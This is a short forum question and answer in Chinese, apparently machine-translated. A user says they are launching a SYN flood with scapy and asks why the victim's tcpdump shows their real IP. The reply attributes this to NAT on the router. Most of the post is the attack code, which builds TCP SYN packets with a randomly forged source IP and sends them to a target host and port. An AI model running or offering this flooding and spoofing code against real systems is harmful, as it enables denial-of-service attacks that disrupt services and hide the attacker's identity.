我使用“ scapy”发起SYN泛洪攻击。下面的代码生成一个伪造的IP作为源IP
攻击者计算机的线缆窃听器将生成的假IP捕获为源IP,但是受害者计算机的tcpdump捕获攻击者的真实IP(不是伪IP)
船长无法欺骗tcpdump吗?还是我的代码有错误?
IP_Packet = IP()
IP_Packet.src = randomIP() #generate a fake IP as source IP
IP_Packet.dst = dstIP
TCP_Packet = TCP()
TCP_Packet.sport = s_port
TCP_Packet.dport = dstPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
send(IP_Packet / TCP_Packet, verbose=0)
如果受害计算机与攻击者不在同一网络上,则您的路由器可能会在NAT转换期间替换源IP。受害者正在接收(正确的)公共IP地址,而不是(伪造的)私有IP地址